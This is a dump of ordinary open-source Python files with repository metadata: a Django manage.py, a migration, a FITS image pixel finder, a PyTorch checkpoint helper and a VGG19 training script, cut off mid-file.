] | 6 | 2020-03-24T05:42:57.000Z | 2020-03-24T05:42:59.000Z | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
] | 4 | 2019-03-14T11:09:30.000Z | 2019-03-31T18:12:59.000Z | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.875 | 74 | 0.686347 |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| true | true |
f7192f9313d327c6a79ea32950ca12ca646bc3cc | 434 | py | Python | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
] | null | null | null | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
] | null | null | null | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-06 06:01
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| 21.7 | 66 | 0.647465 |
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| true | true |
f7192fe132fcf5d6519186205108fc34b3226385 | 759 | py | Python | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | 2 | 2021-05-21T07:31:49.000Z | 2022-03-28T05:25:44.000Z | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | null | null | null | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | 4 | 2020-11-24T21:12:16.000Z | 2021-09-18T12:26:45.000Z | import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
    """Return the (row, col) position of the brightest pixel in a FITS image.

    Reads the primary HDU of *filename* and returns the first position
    (lowest row index, then column) where the maximum value occurs.
    """
    # FIXES: the original never closed the FITS file (handle leak) and
    # computed perf_counter timings that were never used (dead code).
    with fits.open(filename) as hdulist:
        data = hdulist[0].data
        rows, cols = np.where(data == np.amax(data))
    return (rows[0], cols[0])
if __name__ == '__main__':
    # Demo: locate the brightest pixel of the sample image and print it.
    bright = load_fits('image1.fits')
    print(bright)
    # You can also confirm your result visually:
    from astropy.io import fits
    import matplotlib.pyplot as plt
    hdulist = fits.open('image1.fits')
    data = hdulist[0].data
    # Plot the 2D image data (transposed) with a colorbar for inspection.
    plt.imshow(data.T, cmap=plt.cm.viridis)
    plt.colorbar()
    plt.show()
plt.show() | 25.3 | 48 | 0.708827 | import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
bright = load_fits('image1.fits')
print(bright)
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show() | true | true |
f719309e5d9927ab6c3ee41678119a9d8e7d506c | 3,816 | py | Python | development/multiImage_pytorch/persistence.py | anaikawadi/svbrdf-estimation | c977aa8448b2131af3960895afd1105d29e5484a | [
"MIT"
] | 14 | 2020-06-16T17:01:46.000Z | 2021-12-10T02:02:28.000Z | development/multiImage_pytorch/persistence.py | huanyingyunhan/svbrdf-estimation | 6c169b12210d2a92495c1ab1218dd3e4da0314a5 | [
"MIT"
] | 1 | 2021-08-08T17:28:36.000Z | 2021-08-13T17:20:47.000Z | development/multiImage_pytorch/persistence.py | huanyingyunhan/svbrdf-estimation | 6c169b12210d2a92495c1ab1218dd3e4da0314a5 | [
"MIT"
] | 5 | 2020-12-27T23:00:12.000Z | 2021-12-10T02:02:14.000Z | import gc
import json
import pathlib
import torch
class Checkpoint:
    """Wrapper around a torch training-checkpoint dict with save/load helpers.

    The wrapped dict may hold 'model_type', 'use_coords', 'epoch',
    'model_state_dict' and optionally 'optimizer_state_dict'.
    """
    def __init__(self, checkpoint=None):
        # checkpoint: dict as produced by save()/load(), or None on failure.
        self.checkpoint = checkpoint
    @staticmethod
    def get_checkpoint_path(checkpoint_dir):
        """Canonical checkpoint file location inside *checkpoint_dir*."""
        return checkpoint_dir.joinpath("checkpoint.tar")
    @staticmethod
    def load_legacy(model_dir):
        """Load the old two-file format (model.data + optional state.json).

        Returns a checkpoint dict, or None when no legacy model exists.
        """
        model_path = model_dir.joinpath("model.data")
        state_path = model_dir.joinpath("state.json")
        if not model_path.exists():
            return None
        checkpoint = {
            'model_state_dict' : torch.load(model_path),
        }
        print("Loaded legacy model state")
        if state_path.exists():
            # The legacy training state only carried the epoch counter.
            with open(state_path, 'r') as f:
                state = json.load(f)
            checkpoint['epoch'] = state['epoch']
            print("Loaded legacy training state")
        return checkpoint
    @classmethod
    def load(cls, checkpoint_dir):
        """Load a checkpoint from *checkpoint_dir* (str or Path).

        Falls back to the legacy two-file format when checkpoint.tar is
        absent; the returned Checkpoint may wrap None (see is_valid()).
        """
        if not isinstance(checkpoint_dir, pathlib.Path):
            checkpoint_dir = pathlib.Path(checkpoint_dir)
        checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
        if not checkpoint_path.exists():
            # If there is no checkpoint file we try to perform a legacy load
            checkpoint = Checkpoint.load_legacy(checkpoint_dir)
            if checkpoint is None:
                print("No checkpoint found in directory '{}'".format(checkpoint_dir))
            return cls(checkpoint)
        return cls(torch.load(checkpoint_path))
    @staticmethod
    def save(checkpoint_dir, args, model, optimizer, epoch):
        """Write checkpoint.tar with model (and optionally optimizer) state.

        Creates *checkpoint_dir* if needed; optimizer state is omitted when
        args.omit_optimizer_state_save is set.
        """
        if not isinstance(checkpoint_dir, pathlib.Path):
            checkpoint_dir = pathlib.Path(checkpoint_dir)
        checkpoint_dir.mkdir(parents=True, exist_ok=True)
        checkpoint = {
            'model_type' : args.model_type,
            'use_coords' : True if args.use_coords else False,
            'epoch'      : epoch,
            'model_state_dict': model.state_dict(),
        }
        if not args.omit_optimizer_state_save:
            checkpoint['optimizer_state_dict'] = optimizer.state_dict()
        torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
    def purge(self):
        """Drop the wrapped dict and run GC to release its memory promptly."""
        self.checkpoint = None
        gc.collect()
    def is_valid(self):
        """True when a checkpoint dict was actually loaded."""
        return self.checkpoint is not None
    def restore_args(self, args):
        """Overwrite model_type / use_coords on *args* from the checkpoint."""
        # Restore checkpoint relevant arguments
        if 'model_type' in self.checkpoint:
            args.model_type = self.checkpoint['model_type']
            print("Restored model type '{}'".format(args.model_type))
        else:
            print("Failed to restore model type")
        if 'use_coords' in self.checkpoint:
            args.use_coords = self.checkpoint['use_coords']
            print("Restored use coords flag '{}'".format(args.use_coords))
        else:
            print("Failed to restore use coords flag")
        return args
    def restore_model_state(self, model):
        """Load the stored model weights into *model* (in place) and return it."""
        if 'model_state_dict' in self.checkpoint:
            model.load_state_dict(self.checkpoint['model_state_dict'])
            print("Restored model state")
        else:
            print("Failed to restore model state")
        return model
    def restore_epoch(self, epoch):
        """Return the stored epoch, or the given fallback when absent."""
        if 'epoch' in self.checkpoint:
            epoch = self.checkpoint['epoch']
            print("Restored epoch {}".format(epoch))
        else:
            print("Failed to restore epoch")
        return epoch
    def restore_optimizer_state(self, optimizer):
        """Load stored optimizer state into *optimizer* (in place), return it."""
        if 'optimizer_state_dict' in self.checkpoint:
            optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
            print("Restored optimizer state")
        else:
            print("Failed to restore optimizer state")
        return optimizer
| 31.02439 | 85 | 0.619759 | import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| true | true |
f7193160ab5b74cc0bfaf421bd89b39fb7242385 | 1,594 | py | Python | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | null | null | null | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | 9 | 2021-05-03T01:38:46.000Z | 2021-07-14T13:13:25.000Z | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Models helper
These are helper functions for models.
"""
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
    """Get optimizer function

    Build the optimizer described by *cfg* for *network*'s parameters.

    Args:
        cfg: Config of optimizer (name, lr, decay).
        network: Network of model.

    Returns:
        Optimizer object, or None when no optimizer name is configured.

    Raises:
        NotImplementedError: If the optimizer you want to use is not suppoeted.
    """
    name = cfg.name
    if not name:
        return None
    if name not in SUPPORTED_OPTIMIZER:
        raise NotImplementedError('The optimizer is not supported.')
    if name == "adam":
        return optim.Adam(
            network.parameters(), lr=cfg.lr, weight_decay=cfg.decay
        )
def get_criterion(cfg: object) -> object:
    """Get criterion function

    Build the loss function described by *cfg*.

    Args:
        cfg: Config of criterion (name).

    Returns:
        Criterion object, or None when no criterion name is configured.

    Raises:
        NotImplementedError: If the criterion you want to use is not suppoeted.
    """
    name = cfg.name
    if not name:
        return None
    if name not in SUPPORTED_CRITERION:
        raise NotImplementedError('The loss function is not supported.')
    # Dispatch table instead of an if/elif chain; unknown-but-supported
    # names fall through to an implicit None, matching the original.
    builders = {
        "cross_entropy": nn.CrossEntropyLoss,
        "nll_loss": nn.NLLLoss,
    }
    builder = builders.get(name)
    if builder is not None:
        return builder()
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss() | true | true |
f719316890fdeb362381d720d148647e2cd07220 | 299 | py | Python | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=None, n=6):
    """Generate ability scores for a character.

    Args:
        roll_method: Zero-argument callable producing one score.  Defaults to
            ``roll4d6dl1``; resolved at call time so callers and tests can
            substitute a different roller without touching module state.
        n: Number of scores to generate (default 6, one per ability).

    Returns:
        A list of ``n`` rolled scores.
    """
    if roll_method is None:
        roll_method = roll4d6dl1
    return [roll_method() for _ in range(n)]
| 23 | 50 | 0.692308 | from random import randint
from functools import partial
def roll3d6():
    """Sum of three d6 rolls (result in 3-18)."""
    return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
    """Roll 4d6, drop the lowest die, and return the sum of the rest (3-18)."""
    # Sorting ascending lets us drop the minimum by skipping index 0.
    dice = sorted(randint(1, 6) for i in range(4))
    return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
    """Generate six ability scores using ``roll_method`` (default 4d6 drop lowest)."""
    return [roll_method() for i in range(6)]
| true | true |
f71931a377b93d7eb6f7878b5c0f35e19f2a5c5c | 1,092 | py | Python | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
# Locate the CUDA runtime source shipped inside this package and, when it is
# present, publish its directory via the environment (presumably consumed by
# the CINN native runtime -- TODO confirm against the C++ side).
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
    # setdefault: keep any value the user already exported.
    os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| 37.655172 | 75 | 0.772894 |
import os
# Register the bundled CUDA runtime header directory in the environment when
# it exists; setdefault preserves any value the user already exported.
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
    os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| true | true |
f7193471cea625250605c013d6247623e3656276 | 482 | py | Python | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | class DynamicMenuMiddleware:
"""
Adds a cookie to track user when navigating our website, so we can
know which part of the web did he/she came from.
"""
    def __init__(self, get_response):
        # Django middleware protocol: keep the next handler in the chain.
        self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| 32.133333 | 70 | 0.682573 | class DynamicMenuMiddleware:
    def __init__(self, get_response):
        # Django middleware protocol: remember the next handler in the chain.
        self.get_response = get_response
    def __call__(self, request):
        """Run the downstream handler; plant the referrer cookie when missing."""
        response = self.get_response(request)
        # Only set the tracking cookie the first time we see this visitor.
        if '_auth_user_menu_referrer' not in request.COOKIES:
            response.set_cookie('_auth_user_menu_referrer', None)
        return response
| true | true |
f71935b8f3aa0244535d6d5bf915f0643fa098c5 | 5,892 | py | Python | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | zhangziyezzy/DeepLearningMugenKnock | e306f436fb41b5549d0adf9ad331d638e5906e29 | [
"MIT"
] | 10 | 2021-12-17T06:07:25.000Z | 2022-03-25T13:50:05.000Z | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | karaage0703/DeepLearningMugenKnock | 26830fe049c7da8001977ca0df12e946c0f030eb | [
"MIT"
] | null | null | null | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | karaage0703/DeepLearningMugenKnock | 26830fe049c7da8001977ca0df12e946c0f030eb | [
"MIT"
] | 2 | 2022-03-15T02:42:09.000Z | 2022-03-30T23:19:55.000Z | import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
#---
# config
#---
# Training/evaluation configuration (EasyDict gives attribute access).
cfg = EasyDict()
# class
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
# model
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
# NOTE(review): this is the VGG19 script but checkpoints are named VGG16_* --
# confirm whether the filename is intentional.
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
# NOTE(review): NLLLoss expects log-probabilities; the model's forward must
# end in log_softmax (not softmax) for this loss to be mathematically correct.
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
# random seed
torch.manual_seed(0)
class VGG19(torch.nn.Module):
    """VGG19 with batch normalization for small (64x64) images.

    Five convolution blocks (2-2-4-4-4 conv layers; each conv followed by
    ReLU and BatchNorm) with 2x2 max pooling between blocks, then a
    two-layer fully connected head.  ``forward`` returns log-probabilities
    so the network pairs correctly with ``cfg.LOSS_FUNCTION``
    (``torch.nn.NLLLoss``).

    Fixes over the previous revision:
      * block 5 used the key ``'conv5_3'`` twice in its ``OrderedDict``
        literal, silently dropping one of the four convolutions VGG19
        requires; the fourth layer is now ``'conv5_4'``.
      * the output was ``softmax`` even though the configured loss is
        ``NLLLoss`` (which expects log-probabilities); it is now
        ``log_softmax``.
    """
    def __init__(self):
        super(VGG19, self).__init__()
        # Block 1: 2 x conv3x3(64)
        self.conv1 = torch.nn.Sequential(OrderedDict({
            'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
            'conv1_1_relu' : torch.nn.ReLU(),
            'conv1_1_bn' : torch.nn.BatchNorm2d(64),
            'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
            'conv1_2_relu' : torch.nn.ReLU(),
            'conv1_2_bn' : torch.nn.BatchNorm2d(64),
        }))
        # Block 2: 2 x conv3x3(128)
        self.conv2 = torch.nn.Sequential(OrderedDict({
            'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
            'conv2_1_relu' : torch.nn.ReLU(),
            'conv2_1_bn' : torch.nn.BatchNorm2d(128),
            'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
            'conv2_2_relu' : torch.nn.ReLU(),
            'conv2_2_bn' : torch.nn.BatchNorm2d(128),
        }))
        # Block 3: 4 x conv3x3(256)
        self.conv3 = torch.nn.Sequential(OrderedDict({
            'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
            'conv3_1_relu' : torch.nn.ReLU(),
            'conv3_1_bn' : torch.nn.BatchNorm2d(256),
            'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_2_relu' : torch.nn.ReLU(),
            'conv3_2_bn' : torch.nn.BatchNorm2d(256),
            'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_3_relu' : torch.nn.ReLU(),
            'conv3_3_bn' : torch.nn.BatchNorm2d(256),
            'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_4_relu' : torch.nn.ReLU(),
            'conv3_4_bn' : torch.nn.BatchNorm2d(256),
        }))
        # Block 4: 4 x conv3x3(512)
        self.conv4 = torch.nn.Sequential(OrderedDict({
            'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
            'conv4_1_relu' : torch.nn.ReLU(),
            'conv4_1_bn' : torch.nn.BatchNorm2d(512),
            'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_2_relu' : torch.nn.ReLU(),
            'conv4_2_bn' : torch.nn.BatchNorm2d(512),
            'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_3_relu' : torch.nn.ReLU(),
            'conv4_3_bn' : torch.nn.BatchNorm2d(512),
            'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_4_relu' : torch.nn.ReLU(),
            'conv4_4_bn' : torch.nn.BatchNorm2d(512),
        }))
        # Block 5: 4 x conv3x3(512).  The fourth conv was previously lost to
        # a duplicated 'conv5_3' dict key.
        self.conv5 = torch.nn.Sequential(OrderedDict({
            'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_1_relu' : torch.nn.ReLU(),
            'conv5_1_bn' : torch.nn.BatchNorm2d(512),
            'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_2_relu' : torch.nn.ReLU(),
            'conv5_2_bn' : torch.nn.BatchNorm2d(512),
            'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_3_relu' : torch.nn.ReLU(),
            'conv5_3_bn' : torch.nn.BatchNorm2d(512),
            'conv5_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_4_relu' : torch.nn.ReLU(),
            'conv5_4_bn' : torch.nn.BatchNorm2d(512),
        }))
        # Classifier head: two hidden layers of 256 units with dropout.
        self.top = torch.nn.Sequential(OrderedDict({
            'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
            'Dense1_relu' : torch.nn.ReLU(),
            'Dense1_dropout' : torch.nn.Dropout(p=0.5),
            'Dense2' : torch.nn.Linear(256, 256),
            'Dense2_relu' : torch.nn.ReLU(),
            'Dense2_dropout' : torch.nn.Dropout(p=0.5),
        }))
        self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
    def forward(self, x):
        # Each block ends in a 2x2 max pool: 5 pools -> spatial factor 32.
        x = F.max_pool2d(self.conv1(x), 2, stride=2, padding=0)
        x = F.max_pool2d(self.conv2(x), 2, stride=2, padding=0)
        x = F.max_pool2d(self.conv3(x), 2, stride=2, padding=0)
        x = F.max_pool2d(self.conv4(x), 2, stride=2, padding=0)
        x = F.max_pool2d(self.conv5(x), 2, stride=2, padding=0)
        x = x.view(x.shape[0], -1)
        x = self.top(x)
        x = self.fc_out(x)
        # log_softmax (not softmax): cfg.LOSS_FUNCTION is NLLLoss, which
        # consumes log-probabilities.
        x = F.log_softmax(x, dim=1)
        return x
# main
if __name__ == '__main__':
    # Create the checkpoint directory before handing off to the shared trainer.
    model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
    os.makedirs(model_save_dir, exist_ok=True)
    main(cfg, VGG19())
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
# Training/evaluation configuration (EasyDict gives attribute access).
cfg = EasyDict()
# Dataset classes.
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
# Model input geometry.
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
# NOTE(review): VGG19 script saving checkpoints named VGG16_* -- confirm.
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
# NOTE(review): NLLLoss expects log-probabilities from the model's forward.
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
# Fix the RNG seed for reproducibility.
torch.manual_seed(0)
class VGG19(torch.nn.Module):
    """VGG19-style network with batch normalization.

    NOTE(review): the ``conv5`` OrderedDict literal repeats the key
    ``'conv5_3'``; in a dict literal the second entry overwrites the first,
    so block 5 ends up with three convolutions instead of the four that
    VGG19 specifies.  The last trio should be named ``conv5_4``.
    NOTE(review): ``forward`` ends in ``softmax`` while the configured loss
    is ``NLLLoss``, which expects log-probabilities (``log_softmax``).
    """
    def __init__(self):
        super(VGG19, self).__init__()
        # Block 1: 2 x conv3x3(64)
        self.conv1 = torch.nn.Sequential(OrderedDict({
            'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
